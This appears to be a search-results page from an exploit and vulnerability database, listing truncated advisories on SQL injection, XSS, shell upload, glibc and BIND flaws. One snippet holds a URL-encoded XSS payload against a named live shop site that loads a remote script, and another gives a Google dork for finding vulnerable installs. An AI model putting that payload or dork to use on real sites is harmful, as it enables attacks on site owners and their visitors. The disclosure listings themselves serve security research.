3241 matches found
SchoolMation Version 2.3 SQLi and XSS Vulnerability
Exploit for php platform in category web applications: SchoolMation Version 2.3 SQLi and XSS Vulnerability...
iScripts eSwap v2.0 XSS / SQL Injection Vulnerability
Exploit for php platform in category web applications. Title: iScripts eSwap v2.0 sqli and xss vulnerability Author: Sid3^effects...
iScripts eSwap 2.0 - SQL Injection / Cross-Site Scripting
Title: iScripts eSwap v2.0 sqli and xss vulnerability Author: Sid3^effects Published: 2010-06-05 price: $99.95 email: [email protected] vendor: iScripts url: http://www.iscripts.com/eswap/ google dork: Powered by iScripts eSwap. ...
Cross-site Scripting (XSS) Vulnerability in Nuggetz CMS
High-Tech Bridge SA Security Research Lab has discovered a vulnerability in Nuggetz CMS which could be exploited to perform cross-site scripting attacks. 1) Cross-site scripting (XSS) vulnerability in Nuggetz CMS The vulnerability exists due to input sanitation error in the "pagevalue" parameter in...
Burning Board Lite 1.0.2 Shell Upload
Title: Burning Board Lite 1.0.2 Upload Shell Vulnerability | Author: indoushka | email: [email protected] | Home: www.iqs3cur1ty.com | Script: Powered by Burning Board Lite 1.0.2 | Tested on: windo...
XT-Commerce v1 Beta 1 permission bypass: modify and download backup vulnerability
Premiere: the Red section of the network security Author: Amxking Submitted to: indoushka Vulnerability program: XT-Commerce v1 Beta 1 Affected version: v1 Beta 1 Risk level: medium Vulnerability description: Amxking:the vulnerability is I and the foreign Avengers team communication time obtained...
XSS vulnerability in some JSPs under admin section
Several JSPs found under the admin section of Confluence have been found to be vulnerable to XSS attacks. This issue corrects those problems. This issue is rated HIGH. Please refer to http://confluence.atlassian.com/x/ZILmD for information on other security related issues and more information on...
Announcement Preview banner is a vector for an XSS attack
The announcement preview banner is currently displayed via the global decorator. It can be used for an XSS attack on virtually every page, via the announcementpreviewbannerst URL parameter. We should display the preview only locally in the admin section...
Local Glibc Shared Library (.so) 2.11.1 - Code Execution
Local Glibc Shared Library .so 2.11.1 - Code Execution Exploit Title: Local Glibc shared library .so exploit Date: 07.04.10 Author: Rh0 [email protected] Software Link: NA Version: Tools-Plugins" in the menu or at latest when they are activated. dlopen is used for initializing and is part of glibc. Se...
Local Glibc shared library (.so) <= 2.11.1 exploit
Exploit for multiple platform in category local exploits. Local Glibc shared library .so Tools-Plugins" in the menu or at latest when they are activated. dlopen is used for initializing and is part of glibc. See http://linux.die.net/man/3/dlopen...
Easy-Clanpage 2.2 SQL Injection
Information: +Name : Easy-Clanpage 2.2 http://www.easy-clanpage.de /?section=downloads&action=viewdl&id=18 +Demo : http://studio.siouxsie-fashion.at +Price : for free +Language : PHP +Discovered by Easy Laster +Security...
Multiple Stored XSS in XOOPS 2.4.4 Admin Section
Greetz to all Darkc0de, AI, ICW, AH Members Shoutz to r45c4l, j4ckh4x0r, silic0n, smith, baltazar, d3hydr8, FB1H2S, lowlz, Eberly, Sumit, Author: Beenu Arora Home : www.BeenuArora.com Email : [email protected] Share the c0de! Exploit: Multiple Stored XSS in XOOPS 2.4.4 Admin Section AppSite:...
FreePBX 2.5.x - Information Disclosure
Advisory Name: Information disclosure in FreePBX 2.5.x Internal Cybsec Advisory Id: 2010-0101 Vulnerability Class: Information disclosure Release Date: 15/01/2010 Affected Applications: Confirmed in FreePBX 2.5.x Other versions may also be affected Affected Platforms: Any running FreePBX2.5.x Loc...
CVE-2009-4429
Cross-site scripting (XSS) vulnerability in the Sections module 5.x before 5.x-1.3 and 6.x before 6.x-1.3 for Drupal allows remote authenticated users with "administer sections" privileges to inject arbitrary web script or HTML via a section name (aka the Name field)...
Orkut Cross Site Scripting
Patched as of 12/12/2009. All the test procedure along with snapshot is attached in the mail. The vulnerability exists in Video section of orkut. I took following steps to exploit the vulnerability: 1. Login in Orkut account. 2. In your video section, click on "edit description". 3. Now enter the...
Illogator Shop Cross Site Scripting
ILLOGATOR SHOP / XSS: index.php?section=bycategory&subcatid=4&subname=xss EXAMPLE : http://illogator.com/index.php?section=bycategory&subcatid=4&subname=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E...
bind: cache poisoning using not validated DNSSEC responses
Unspecified vulnerability in ISC BIND 9.0.x through 9.3.x, 9.4 before 9.4.3-P4, 9.5 before 9.5.2-P1, 9.6 before 9.6.1-P2, and 9.7 beta before 9.7.0b3, with DNSSEC validation enabled and checking disabled (CD), allows remote attackers to conduct DNS cache poisoning attacks by receiving a recursive...
DEBIAN-CVE-2009-4022
Unspecified vulnerability in ISC BIND 9.0.x through 9.3.x, 9.4 before 9.4.3-P4, 9.5 before 9.5.2-P1, 9.6 before 9.6.1-P2, and 9.7 beta before 9.7.0b3, with DNSSEC validation enabled and checking disabled (CD), allows remote attackers to conduct DNS cache poisoning attacks by receiving a recursive...